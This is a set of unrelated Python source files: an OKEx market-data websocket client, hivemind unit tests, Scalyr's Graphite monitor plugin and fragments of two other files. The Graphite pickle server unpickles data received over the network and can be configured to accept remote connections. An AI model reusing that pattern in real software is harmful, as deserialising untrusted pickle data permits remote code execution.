cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
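# A minimal driver sketch for the public entry point above; the function name and test
# directories are placeholders, and CDash XML is only generated/submitted when a build
# name is supplied.
def _example_wait(test_dirs):
    ok = wait_for_tests(
        test_dirs,
        check_throughput=False,
        check_memory=False,
        cdash_build_name=None,  # set e.g. "nightly-gnu" to generate and submit CDash XML
    )
    return 0 if ok else 1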
|
okex_websocket.py
|
from exchange_sockets.exchange_websocket import ExchangeWebSocket
from singletones.custom_logger import MyLogger
import websocket
import threading
from time import sleep
from time import time
import json
import zlib
logger = MyLogger()
class OkexWebsocket(ExchangeWebSocket):
def __init__(self, stream_n_pairs):
super().__init__('Okex', stream_n_pairs)
self.possible_streams = ['depth', 'trade']
self.stream = {}
def init_streams(self):
streams_list = []
for pair, streams in self.pairs_n_streams.items():
for sub_stream in streams.split(','):
if self.has_stream(sub_stream):
streams_list.append("spot/{}:{}".format(sub_stream, pair))
self.stream['op'] = 'subscribe'
self.stream['args'] = streams_list
def start_multiple_websocket(self, init_streams=True):
super().start_multiple_websocket(init_streams=init_streams)
websocket.enableTrace(True)
self.ws = websocket.WebSocketApp("wss://real.okex.com:8443/ws/v3",
on_open=self.__on_open,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = 15
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
logger.error("%s Couldn't connect to %s! Exiting.",
self.node,
self.exchange)
self.close_socket()
else:
logger.info('{} socket is started:\n{}\n{}'.format(self.exchange,
self.node,
self.stream))
def inflate(self, data):
decompress = zlib.decompressobj(
-zlib.MAX_WBITS  # negative wbits: raw DEFLATE stream without a zlib header, as sent by OKEx
)
inflated = decompress.decompress(data)
inflated += decompress.flush()
return inflated
def save_trade(self, message):
data_to_append = {}
stream = message['table'].split('/')[1]
for data in message['data']:
symbol = data['instrument_id']
time_stamp = data['timestamp']
append_msg = "{},{},{},{}\n".format(time_stamp,
data['price'],
data['size'],
data['side'][0])
if not data_to_append.get(symbol, None):
data_to_append[symbol] = []
data_to_append[symbol].append(append_msg)
for symbol, append_msgs in data_to_append.items():
append_msg = "".join(append_msgs)
self.file_manager.save_data_to_file(self.exchange,
stream,
symbol,
append_msg)
def save_level2_orderbook(self, message):
stream = message['table'].split('/')[1]
data_to_append = {}
for data in message['data']:
symbol = data['instrument_id']
time_stamp = data['timestamp']
append_msg = ""
for ask in data['asks']:
append_msg += "{},{},-{},{}\n".format(time_stamp, ask[0], ask[1], ask[2])
for bid in data['bids']:
append_msg += "{},{},{},{}\n".format(time_stamp, bid[0], bid[1], bid[2])
if not data_to_append.get(symbol, None):
data_to_append[symbol] = []
data_to_append[symbol].append(append_msg)
for symbol, append_msgs in data_to_append.items():
append_msg = "".join(append_msgs)
self.file_manager.save_data_to_file(self.exchange,
stream,
symbol,
append_msg)
def __on_message(self, ws, message):
if message is None:
return
try:
self.last_msg_time = int(time())
message = self.inflate(message)
message = json.loads(message.decode("utf-8"))
if message['table'] == 'spot/depth':
if message['action'] == 'update':
self.save_level2_orderbook(message)
elif message['table'] == 'spot/trade':
self.save_trade(message)
except Exception as e:
logger.debug(str(e))
def __on_error(self, ws, error):
self.on_error = True
logger.error("On error\n{}\n{} {}".format(self.node,
self.exchange,
error))
def __on_close(self, ws):
logger.info("On close\n{}".format(self.exchange))
def __on_open(self, ws):
logger.info("On Open\n{}".format(self.exchange))
if self.stream:
self.ws.send(json.dumps(self.stream))
else:
logger.error('%s. Stream is not initialized', self.exchange)
def close_socket(self):
self.exited = True
if self.ws:
self.ws.close()
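# A minimal offline sketch of two pieces above: the subscribe payload that init_streams()
# builds for a {'pair': 'streams'} mapping, and the raw-DEFLATE decompression that
# inflate() performs on OKEx frames. The pair name is a placeholder and no network
# connection is made; only zlib/json from this module's imports are used.
def _example_okex_offline():
    # shape produced by init_streams() for {'BTC-USDT': 'depth,trade'}
    subscribe_msg = {'op': 'subscribe', 'args': ['spot/depth:BTC-USDT', 'spot/trade:BTC-USDT']}
    # OKEx sends raw DEFLATE (no zlib header); compress the same way to simulate a frame
    compressor = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    frame = compressor.compress(json.dumps(subscribe_msg).encode()) + compressor.flush()
    # mirror of inflate(): negative wbits tells zlib to expect a headerless stream
    decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
    inflated = decompressor.decompress(frame) + decompressor.flush()
    return json.loads(inflated.decode('utf-8'))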
|
test_util_modules.py
|
import asyncio
import concurrent.futures
import multiprocessing as mp
import random
import time
import numpy as np
import pytest
import torch
import hivemind
from hivemind.proto.dht_pb2_grpc import DHTStub
from hivemind.proto.runtime_pb2 import CompressionType
from hivemind.proto.runtime_pb2_grpc import ConnectionHandlerStub
from hivemind.utils import DHTExpiration, HeapEntry, MSGPackSerializer, ValueWithExpiration
from hivemind.utils.asyncio import achain, aenumerate, aiter, amap_in_executor, anext, azip
from hivemind.utils.compression import deserialize_torch_tensor, serialize_torch_tensor
from hivemind.utils.mpfuture import InvalidStateError
@pytest.mark.forked
def test_mpfuture_result():
future = hivemind.MPFuture()
def _proc(future):
with pytest.raises(RuntimeError):
future.result() # only creator process can await result
future.set_result(321)
p = mp.Process(target=_proc, args=(future,))
p.start()
p.join()
assert future.result() == 321
assert future.exception() is None
assert future.cancel() is False
assert future.done() and not future.running() and not future.cancelled()
future = hivemind.MPFuture()
with pytest.raises(concurrent.futures.TimeoutError):
future.result(timeout=1e-3)
future.set_result(["abacaba", 123])
assert future.result() == ["abacaba", 123]
@pytest.mark.forked
def test_mpfuture_exception():
future = hivemind.MPFuture()
with pytest.raises(concurrent.futures.TimeoutError):
future.exception(timeout=1e-3)
def _proc(future):
future.set_exception(NotImplementedError())
p = mp.Process(target=_proc, args=(future,))
p.start()
p.join()
assert isinstance(future.exception(), NotImplementedError)
with pytest.raises(NotImplementedError):
future.result()
assert future.cancel() is False
assert future.done() and not future.running() and not future.cancelled()
@pytest.mark.forked
def test_mpfuture_cancel():
future = hivemind.MPFuture()
assert not future.cancelled()
future.cancel()
evt = mp.Event()
def _proc():
with pytest.raises(concurrent.futures.CancelledError):
future.result()
with pytest.raises(concurrent.futures.CancelledError):
future.exception()
with pytest.raises(InvalidStateError):
future.set_result(123)
with pytest.raises(InvalidStateError):
future.set_exception(NotImplementedError())
assert future.cancelled() and future.done() and not future.running()
evt.set()
p = mp.Process(target=_proc)
p.start()
p.join()
assert evt.is_set()
@pytest.mark.forked
def test_mpfuture_status():
evt = mp.Event()
future = hivemind.MPFuture()
def _proc1(future):
assert future.set_running_or_notify_cancel() is True
evt.set()
p = mp.Process(target=_proc1, args=(future,))
p.start()
p.join()
assert evt.is_set()
evt.clear()
assert future.running() and not future.done() and not future.cancelled()
with pytest.raises(InvalidStateError):
future.set_running_or_notify_cancel()
future = hivemind.MPFuture()
assert future.cancel()
def _proc2(future):
assert not future.running() and future.done() and future.cancelled()
assert future.set_running_or_notify_cancel() is False
evt.set()
p = mp.Process(target=_proc2, args=(future,))
p.start()
p.join()
evt.set()
future2 = hivemind.MPFuture()
future2.cancel()
assert future2.set_running_or_notify_cancel() is False
@pytest.mark.asyncio
async def test_await_mpfuture():
# await result from the same process, but a different coroutine
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
async def wait_and_assign_async():
assert f2.set_running_or_notify_cancel() is True
await asyncio.sleep(0.1)
f1.set_result((123, "ololo"))
f2.set_result((456, "pyshpysh"))
asyncio.create_task(wait_and_assign_async())
assert (await asyncio.gather(f1, f2)) == [(123, "ololo"), (456, "pyshpysh")]
# await result from separate processes
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
def wait_and_assign(future, value):
time.sleep(0.1 * random.random())
future.set_result(value)
p1 = mp.Process(target=wait_and_assign, args=(f1, "abc"))
p2 = mp.Process(target=wait_and_assign, args=(f2, "def"))
for p in p1, p2:
p.start()
assert (await asyncio.gather(f1, f2)) == ["abc", "def"]
for p in p1, p2:
p.join()
# await cancel
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
def wait_and_cancel():
time.sleep(0.01)
f2.set_result(123456)
time.sleep(0.1)
f1.cancel()
p = mp.Process(target=wait_and_cancel)
p.start()
with pytest.raises(asyncio.CancelledError):
# note: it is intended that awaiting the cancelled MPFuture raises CancelledError
await asyncio.gather(f1, f2)
p.join()
# await exception
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
def wait_and_raise():
time.sleep(0.01)
f2.set_result(123456)
time.sleep(0.1)
f1.set_exception(ValueError("we messed up"))
p = mp.Process(target=wait_and_raise)
p.start()
with pytest.raises(ValueError):
# note: it is intended that the ValueError set on f1 propagates through gather
await asyncio.gather(f1, f2)
p.join()
@pytest.mark.forked
def test_mpfuture_bidirectional():
evt = mp.Event()
future_from_main = hivemind.MPFuture()
def _future_creator():
future_from_fork = hivemind.MPFuture()
future_from_main.set_result(("abc", future_from_fork))
if future_from_fork.result() == ["we", "need", "to", "go", "deeper"]:
evt.set()
p = mp.Process(target=_future_creator)
p.start()
out = future_from_main.result()
assert isinstance(out[1], hivemind.MPFuture)
out[1].set_result(["we", "need", "to", "go", "deeper"])
p.join()
assert evt.is_set()
@pytest.mark.forked
def test_mpfuture_done_callback():
receiver, sender = mp.Pipe(duplex=False)
events = [mp.Event() for _ in range(6)]
def _future_creator():
future1, future2, future3 = hivemind.MPFuture(), hivemind.MPFuture(), hivemind.MPFuture()
def _check_result_and_set(future):
assert future.done()
assert future.result() == 123
events[0].set()
future1.add_done_callback(_check_result_and_set)
future1.add_done_callback(lambda future: events[1].set())
future2.add_done_callback(lambda future: events[2].set())
future3.add_done_callback(lambda future: events[3].set())
sender.send((future1, future2))
future2.cancel() # trigger future2 callback from the same process
events[0].wait()
future1.add_done_callback(
lambda future: events[4].set()
) # schedule callback after future1 is already finished
events[5].wait()
p = mp.Process(target=_future_creator)
p.start()
future1, future2 = receiver.recv()
future1.set_result(123)
with pytest.raises(RuntimeError):
future1.add_done_callback(lambda future: (1, 2, 3))
assert future1.done() and not future1.cancelled()
assert future2.done() and future2.cancelled()
for i in 0, 1, 4:
events[i].wait(1)
assert events[0].is_set() and events[1].is_set() and events[2].is_set() and events[4].is_set()
assert not events[3].is_set()
events[5].set()
p.join()
@pytest.mark.forked
def test_many_futures():
evt = mp.Event()
receiver, sender = mp.Pipe()
main_futures = [hivemind.MPFuture() for _ in range(1000)]
assert len(hivemind.MPFuture._active_futures) == 1000
def _run_peer():
fork_futures = [hivemind.MPFuture() for _ in range(500)]
assert len(hivemind.MPFuture._active_futures) == 500
for i, future in enumerate(random.sample(main_futures, 300)):
if random.random() < 0.5:
future.set_result(i)
else:
future.set_exception(ValueError(f"{i}"))
sender.send(fork_futures[:-100])
for future in fork_futures[-100:]:
future.cancel()
evt.wait()
assert len(hivemind.MPFuture._active_futures) == 200
for future in fork_futures:
if not future.done():
future.set_result(123)
assert len(hivemind.MPFuture._active_futures) == 0
p = mp.Process(target=_run_peer)
p.start()
some_fork_futures = receiver.recv()
assert len(hivemind.MPFuture._active_futures) == 700
for future in some_fork_futures:
future.set_running_or_notify_cancel()
for future in random.sample(some_fork_futures, 200):
future.set_result(321)
evt.set()
for future in main_futures:
future.cancel()
assert len(hivemind.MPFuture._active_futures) == 0
p.join()
def test_tensor_compression(size=(128, 128, 64), alpha=5e-08, beta=0.0008):
torch.manual_seed(0)
X = torch.randn(*size)
assert torch.allclose(deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.NONE)), X)
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.MEANSTD_16BIT)) - X
assert error.square().mean() < alpha
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.FLOAT16)) - X
assert error.square().mean() < alpha
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.QUANTILE_8BIT)) - X
assert error.square().mean() < beta
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.UNIFORM_8BIT)) - X
assert error.square().mean() < beta
zeros = torch.zeros(5, 5)
for compression_type in CompressionType.values():
assert deserialize_torch_tensor(serialize_torch_tensor(zeros, compression_type)).isfinite().all()
@pytest.mark.forked
@pytest.mark.asyncio
async def test_channel_cache():
hivemind.ChannelCache.MAXIMUM_CHANNELS = 3
hivemind.ChannelCache.EVICTION_PERIOD_SECONDS = 0.1
c1 = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=False)
c2 = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=True)
c3 = hivemind.ChannelCache.get_stub("localhost:1338", DHTStub, aio=False)
c3_again = hivemind.ChannelCache.get_stub("localhost:1338", DHTStub, aio=False)
c1_again = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=False)
c4 = hivemind.ChannelCache.get_stub("localhost:1339", DHTStub, aio=True)
c2_anew = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=True)
c1_yetagain = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=False)
await asyncio.sleep(0.2)
c1_anew = hivemind.ChannelCache.get_stub(target="localhost:1337", aio=False, stub_type=DHTStub)
c1_anew_again = hivemind.ChannelCache.get_stub(target="localhost:1337", aio=False, stub_type=DHTStub)
c1_otherstub = hivemind.ChannelCache.get_stub(target="localhost:1337", aio=False, stub_type=ConnectionHandlerStub)
await asyncio.sleep(0.05)
c1_otherstub_again = hivemind.ChannelCache.get_stub(
target="localhost:1337", aio=False, stub_type=ConnectionHandlerStub
)
all_channels = [c1, c2, c3, c4, c3_again, c1_again, c2_anew, c1_yetagain, c1_anew, c1_anew_again, c1_otherstub]
assert all(isinstance(c, DHTStub) for c in all_channels[:-1])
assert isinstance(all_channels[-1], ConnectionHandlerStub)
assert "aio" in repr(c2.rpc_find)
assert "aio" not in repr(c1.rpc_find)
duplicates = {
(c1, c1_again),
(c1, c1_yetagain),
(c1_again, c1_yetagain),
(c3, c3_again),
(c1_anew, c1_anew_again),
(c1_otherstub, c1_otherstub_again),
}
for i in range(len(all_channels)):
for j in range(i + 1, len(all_channels)):
ci, cj = all_channels[i], all_channels[j]
assert (ci is cj) == ((ci, cj) in duplicates), (i, j)
def test_serialize_tensor():
tensor = torch.randn(512, 12288)
serialized_tensor = serialize_torch_tensor(tensor, CompressionType.NONE)
for chunk_size in [1024, 64 * 1024, 64 * 1024 + 1, 10 ** 9]:
chunks = list(hivemind.split_for_streaming(serialized_tensor, chunk_size))
assert len(chunks) == (len(serialized_tensor.buffer) - 1) // chunk_size + 1
restored = hivemind.combine_from_streaming(chunks)
assert torch.allclose(deserialize_torch_tensor(restored), tensor)
chunk_size = 30 * 1024
serialized_tensor = serialize_torch_tensor(tensor, CompressionType.FLOAT16)
chunks = list(hivemind.split_for_streaming(serialized_tensor, chunk_size))
assert len(chunks) == (len(serialized_tensor.buffer) - 1) // chunk_size + 1
restored = hivemind.combine_from_streaming(chunks)
assert torch.allclose(deserialize_torch_tensor(restored), tensor, rtol=0, atol=1e-2)
tensor = torch.randint(0, 100, (512, 1, 1))
serialized_tensor = serialize_torch_tensor(tensor, CompressionType.NONE)
chunks = list(hivemind.split_for_streaming(serialized_tensor, chunk_size))
assert len(chunks) == (len(serialized_tensor.buffer) - 1) // chunk_size + 1
restored = hivemind.combine_from_streaming(chunks)
assert torch.allclose(deserialize_torch_tensor(restored), tensor)
scalar = torch.tensor(1.0)
serialized_scalar = serialize_torch_tensor(scalar, CompressionType.NONE)
assert torch.allclose(deserialize_torch_tensor(serialized_scalar), scalar)
serialized_scalar = serialize_torch_tensor(scalar, CompressionType.FLOAT16)
assert torch.allclose(deserialize_torch_tensor(serialized_scalar), scalar)
def test_serialize_tuple():
test_pairs = (
((1, 2, 3), [1, 2, 3]),
(("1", False, 0), ["1", False, 0]),
(("1", False, 0), ("1", 0, 0)),
(("1", b"qq", (2, 5, "0")), ["1", b"qq", (2, 5, "0")]),
)
for first, second in test_pairs:
assert MSGPackSerializer.loads(MSGPackSerializer.dumps(first)) == first
assert MSGPackSerializer.loads(MSGPackSerializer.dumps(second)) == second
assert MSGPackSerializer.dumps(first) != MSGPackSerializer.dumps(second)
def test_split_parts():
tensor = torch.randn(910, 512)
serialized_tensor_part = serialize_torch_tensor(tensor, allow_inplace=False)
chunks1 = list(hivemind.utils.split_for_streaming(serialized_tensor_part, 16384))
assert len(chunks1) == int(np.ceil(tensor.numel() * tensor.element_size() / 16384))
chunks2 = list(hivemind.utils.split_for_streaming(serialized_tensor_part, 10_000))
assert len(chunks2) == int(np.ceil(tensor.numel() * tensor.element_size() / 10_000))
chunks3 = list(hivemind.utils.split_for_streaming(serialized_tensor_part, 10 ** 9))
assert len(chunks3) == 1
compressed_tensor_part = serialize_torch_tensor(tensor, CompressionType.FLOAT16, allow_inplace=False)
chunks4 = list(hivemind.utils.split_for_streaming(compressed_tensor_part, 16384))
assert len(chunks4) == int(np.ceil(tensor.numel() * 2 / 16384))
combined1 = hivemind.utils.combine_from_streaming(chunks1)
combined2 = hivemind.utils.combine_from_streaming(iter(chunks2))
combined3 = hivemind.utils.combine_from_streaming(chunks3)
combined4 = hivemind.utils.combine_from_streaming(chunks4)
for combined in combined1, combined2, combined3:
assert torch.allclose(tensor, deserialize_torch_tensor(combined), rtol=1e-5, atol=1e-8)
assert torch.allclose(tensor, deserialize_torch_tensor(combined4), rtol=1e-3, atol=1e-3)
combined_incomplete = hivemind.utils.combine_from_streaming(chunks4[:5])
combined_incomplete2 = hivemind.utils.combine_from_streaming(chunks4[:1])
combined_incomplete3 = hivemind.utils.combine_from_streaming(chunks4[:-1])
for combined in combined_incomplete, combined_incomplete2, combined_incomplete3:
with pytest.raises(RuntimeError):
deserialize_torch_tensor(combined)
# note: we rely on this being RuntimeError in hivemind.averaging.allreduce.AllreduceRunner
def test_generic_data_classes():
value_with_exp = ValueWithExpiration(value="string_value", expiration_time=DHTExpiration(10))
assert value_with_exp.value == "string_value" and value_with_exp.expiration_time == DHTExpiration(10)
heap_entry = HeapEntry(expiration_time=DHTExpiration(10), key="string_value")
assert heap_entry.key == "string_value" and heap_entry.expiration_time == DHTExpiration(10)
sorted_expirations = sorted([DHTExpiration(value) for value in range(1, 1000)])
sorted_heap_entries = sorted([HeapEntry(DHTExpiration(value), key="any") for value in range(1, 1000)[::-1]])
assert all([entry.expiration_time == value for entry, value in zip(sorted_heap_entries, sorted_expirations)])
@pytest.mark.asyncio
async def test_asyncio_utils():
res = [i async for i, item in aenumerate(aiter("a", "b", "c"))]
assert res == list(range(len(res)))
num_steps = 0
async for elem in amap_in_executor(lambda x: x ** 2, aiter(*range(100)), max_prefetch=5):
assert elem == num_steps ** 2
num_steps += 1
assert num_steps == 100
ours = [elem async for elem in amap_in_executor(max, aiter(*range(7)), aiter(*range(-50, 50, 10)), max_prefetch=1)]
ref = list(map(max, range(7), range(-50, 50, 10)))
assert ours == ref
ours = [row async for row in azip(aiter("a", "b", "c"), aiter(1, 2, 3))]
ref = list(zip(["a", "b", "c"], [1, 2, 3]))
assert ours == ref
async def _aiterate():
yield "foo"
yield "bar"
yield "baz"
iterator = _aiterate()
assert (await anext(iterator)) == "foo"
tail = [item async for item in iterator]
assert tail == ["bar", "baz"]
with pytest.raises(StopAsyncIteration):
await anext(iterator)
assert [item async for item in achain(_aiterate(), aiter(*range(5)))] == ["foo", "bar", "baz"] + list(range(5))
|
graphite_monitor.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# A ScalyrMonitor plugin that acts as a Graphite server, accepting metrics using either the
# text or pickle protocol and sends them to Scalyr.
#
# Note, this can be run in standalone mode by:
# python -m scalyr_agent.run_monitor scalyr_agent.builtin_monitors.graphite_monitor
#
# author: Steven Czerwinski <czerwin@scalyr.com>
__author__ = 'czerwin@scalyr.com'
try:
# noinspection PyPep8Naming
import cPickle as pickle
except ImportError:
import pickle
from scalyr_agent import StoppableThread
from scalyr_agent import ScalyrMonitor, define_config_option, define_log_field
from scalyr_agent.monitor_utils import ServerProcessor, LineRequestParser, Int32RequestParser
__monitor__ = __name__
# Configuration parameters are:
# only_accept_local: (defaults to True)
# accept_plaintext: (defaults to True)
# accept_pickle: (defaults to True)
# plaintext_port: (defaults to 2003)
# pickle_port: (defaults to 2004)
# max_connection_idle_time: (defaults to 300)
# max_request_size: (defaults to 100K)
# buffer_size: (defaults to 100K)
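# For illustration only: a hypothetical "monitors" stanza in the agent configuration using the
# options defined below (values are examples, not recommendations):
#
#   {
#     "monitors": [
#       {
#         "module": "scalyr_agent.builtin_monitors.graphite_monitor",
#         "only_accept_local": true,
#         "accept_plaintext": true,
#         "accept_pickle": false,
#         "plaintext_port": 2003,
#         "max_connection_idle_time": 300
#       }
#     ]
#   }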
define_config_option(__monitor__, 'module',
'Always ``scalyr_agent.builtin_monitors.graphite_monitor``',
convert_to=str, required_option=True)
define_config_option(__monitor__, 'only_accept_local',
'Optional (defaults to true). If true, then the plugin only accepts connections from localhost. '
'If false, all network connections are accepted.',
default=True, convert_to=bool)
define_config_option(__monitor__, 'accept_plaintext',
'Optional (defaults to true). If true, then the plugin accepts connections in Graphite\'s "plain '
'text" procotol.', default=True, convert_to=bool)
define_config_option(__monitor__, 'accept_pickle',
'Optional (defaults to true). If true, then the plugin accepts connections in Graphite\'s '
'"pickle" procotol.', default=True, convert_to=bool)
define_config_option(__monitor__, 'plaintext_port',
'Optional (defaults to 2003). The port number on which the plugin listens for plain text '
'connections. Unused if ``accept_plaintext`` is false.',
default=2003, min_value=1, max_value=65535, convert_to=int)
define_config_option(__monitor__, 'pickle_port',
'Optional (defaults to 2004). The port number on which the plugin listens for pickle connections. '
                     'Unused if ``accept_pickle`` is false.',
default=2004, min_value=1, max_value=65535, convert_to=int)
define_config_option(__monitor__, 'max_connection_idle_time',
'Optional (defaults to 300). The maximum number of seconds allowed between requests before the '
'Graphite server will close the connection.', default=300.0, min_value=1, convert_to=float)
define_config_option(__monitor__, 'max_request_size',
'Optional (defaults to 100K). The maximum size of a single request in bytes.', default=100*1024,
min_value=1000, convert_to=int)
define_config_option(__monitor__, 'buffer_size',
'Optional (defaults to 100KB). The maximum buffer size in bytes for buffering incoming requests '
'per connection', default=100*1024, min_value=10*1024, convert_to=int)
define_log_field(__monitor__, 'monitor', 'Always ``graphite_monitor``.')
define_log_field(__monitor__, 'metric', 'The Graphite metric name.')
define_log_field(__monitor__, 'value', 'The Graphite metric value.')
define_log_field(__monitor__, 'orig_time', 'The Graphite timestamp.')
class GraphiteMonitor(ScalyrMonitor):
"""A Scalyr agent monitor acts as a Graphite server, accepting metrics over a network connection and then sends
them to Scalyr.
"""
def _initialize(self):
"""Performs monitor-specific initialization.
"""
self.__only_accept_local = self._config.get('only_accept_local')
self.__accept_plaintext = self._config.get('accept_plaintext')
self.__accept_pickle = self._config.get('accept_pickle')
self.__plaintext_port = self._config.get('plaintext_port')
self.__pickle_port = self._config.get('pickle_port')
self.__max_connection_idle_time = self._config.get('max_connection_idle_time')
self.__max_request_size = self._config.get('max_request_size')
self.__buffer_size = self._config.get('buffer_size')
# We may need an extra thread for this monitor if we are accepting traffic on both the text and pickle
# ports since our server abstractions require a thread per port.
self.__extra_thread = None
if not self.__accept_plaintext and not self.__accept_pickle:
raise Exception('Invalid config state for Graphite Monitor. At least one of accept_plaintext or '
'accept_pickle must be true')
if self.__max_request_size > self.__buffer_size:
raise Exception('The max_request_size of %d cannot be greater than the buffer size of %d' %
(self.__max_request_size, self.__buffer_size))
def run(self):
# We have to (maybe) start up two servers. Since each server requires its own thread, we may have
# to create a new one (since we can use this thread to run one of the servers).
if self.__accept_plaintext:
text_server = GraphiteTextServer(self.__only_accept_local, self.__plaintext_port, self._run_state,
self.__buffer_size, self.__max_request_size,
self.__max_connection_idle_time, self._logger)
else:
text_server = None
if self.__accept_pickle:
pickle_server = GraphitePickleServer(self.__only_accept_local, self.__pickle_port, self._run_state,
self.__buffer_size, self.__max_request_size,
self.__max_connection_idle_time, self._logger)
else:
pickle_server = None
if not self.__accept_plaintext:
pickle_server.run()
elif not self.__accept_pickle:
text_server.run()
else:
            # If we are accepting both kinds of traffic, we need a second thread to handle one of the ports; the
# other one will be handled by this thread.
# noinspection PyAttributeOutsideInit
self.__extra_thread = StoppableThread(target=text_server.run, name='Graphite monitor text server thread')
self.__extra_thread.start()
pickle_server.run()
def stop(self, wait_on_join=True, join_timeout=5):
# The order here is important. Since our servers use self._run_state to know when to stop, we need to
# invoke the inherited method first since that is what actually stops self._run_state. Then we can join
# on the threads.
ScalyrMonitor.stop(self, wait_on_join=wait_on_join, join_timeout=join_timeout)
if self.__extra_thread is not None:
self.__extra_thread.stop(wait_on_join=wait_on_join, join_timeout=join_timeout)
class GraphiteTextServer(ServerProcessor):
"""Accepts connections on a server socket and handles them using Graphite's plaintext protocol format, emitting
the received metrics to the log.
"""
def __init__(self, only_accept_local, port, run_state, buffer_size, max_request_size,
max_connection_idle_time, logger):
"""Creates a new instance.
@param only_accept_local: If true, only accept local connections.
@param port: The port on which to accept connections.
@param run_state: The run_state to use to control when this server should stop accepting connections and new
requests. If 'run_state's 'stop' method is invoked, then 'run' will terminate.
@param buffer_size: The maximum buffer size for buffering incoming requests per connection.
@param max_request_size: The maximum size of an individual request. If this is exceeded, then the connection
responsible is terminated.
@param max_connection_idle_time: The maximum time to wait on a connection between requests before closing it.
@param logger: The logger to use to record errors and metrics.
"""
self.__logger = logger
self.__parser = LineRequestParser(max_request_size)
ServerProcessor.__init__(self, port, localhost_socket=only_accept_local, max_request_size=max_request_size,
max_connection_idle_time=max_connection_idle_time,
buffer_size=buffer_size, run_state=run_state)
def execute_request(self, request):
try:
# This is how the carbon graphite server parses the line. We could be more forgiving but if it works
# for them, then we can do it as well.
metric, value, orig_timestamp = request.strip().split()
value = float(value)
orig_timestamp = float(orig_timestamp)
# Include the time that the original graphite request said to associate with the metric value.
self.__logger.emit_value(metric, value, extra_fields={'orig_time': orig_timestamp})
except ValueError:
self.__logger.warn('Could not parse incoming metric line from graphite plaintext server, ignoring',
error_code='graphite_monitor/badPlainTextLine')
def parse_request(self, request_input, num_available_bytes):
return self.__parser.parse_request(request_input, num_available_bytes)
def report_connection_problem(self, exception):
self.__logger.exception('Exception seen while processing Graphite connect on text port, '
'closing connection: "%s"' % str(exception))
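# For illustration, a client can push a single metric in Graphite's plaintext format
# ("<metric> <value> <timestamp>\n") using only the standard library. This sketch assumes the
# defaults above (localhost, port 2003) and is not part of the monitor itself:
#
#   import socket, time
#   sock = socket.create_connection(('localhost', 2003))
#   sock.sendall('servers.web01.cpu.load 0.42 %d\n' % int(time.time()))
#   sock.close()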
class GraphitePickleServer(ServerProcessor):
"""Accepts connections on a server socket and handles them using Graphite's pickle protocol format, emitting
the received metrics to the log.
"""
def __init__(self, only_accept_local, port, run_state, buffer_size, max_request_size,
max_connection_idle_time, logger):
"""Creates a new instance.
@param only_accept_local: If true, only accept local connections.
@param port: The port on which to accept connections.
@param run_state: The run_state to use to control when this server should stop accepting connections and new
requests. If 'run_state's 'stop' method is invoked, then 'run' will terminate.
@param buffer_size: The maximum buffer size for buffering incoming requests per connection.
@param max_request_size: The maximum size of an individual request. If this is exceeded, then the connection
responsible is terminated.
@param max_connection_idle_time: The maximum time to wait on a connection between requests before closing it.
@param logger: The logger to use to record errors and metrics.
"""
self.__logger = logger
self.__request_parser = Int32RequestParser(max_request_size)
ServerProcessor.__init__(self, port, localhost_socket=only_accept_local, max_request_size=max_request_size,
max_connection_idle_time=max_connection_idle_time, buffer_size=buffer_size,
run_state=run_state)
def execute_request(self, request):
# noinspection PyBroadException
try:
# Use pickle to read the binary data.
data_object = pickle.loads(request)
        except: # pickle.loads is documented as raising any type of exception, so we have to catch them all.
self.__logger.warn('Could not parse incoming metric line from graphite pickle server, ignoring',
error_code='graphite_monitor/badUnpickle')
return
try:
# The format should be [[ metric [ timestamp, value]] ... ]
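            # For illustration (not executed here), a sender could build such a payload with something like:
            #   pickle.dumps([('servers.web01.cpu.load', (1400509800, 0.42))], protocol=2)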
for (metric, datapoint) in data_object:
value = float(datapoint[1])
orig_timestamp = float(datapoint[0])
self.__logger.emit_value(metric, value, extra_fields={'orig_time': orig_timestamp})
except ValueError:
self.__logger.warn('Could not parse incoming metric line from graphite pickle server, ignoring',
error_code='graphite_monitor/badPickleLine')
def parse_request(self, request_input, num_available_bytes):
return self.__request_parser.parse_request(request_input, num_available_bytes)
def report_connection_problem(self, exception):
self.__logger.exception(
'Exception seen while processing Graphite connect on pickle port, closing connection: "%s"' %
str(exception))
|
snapshot.py
|
import io
import multiprocessing
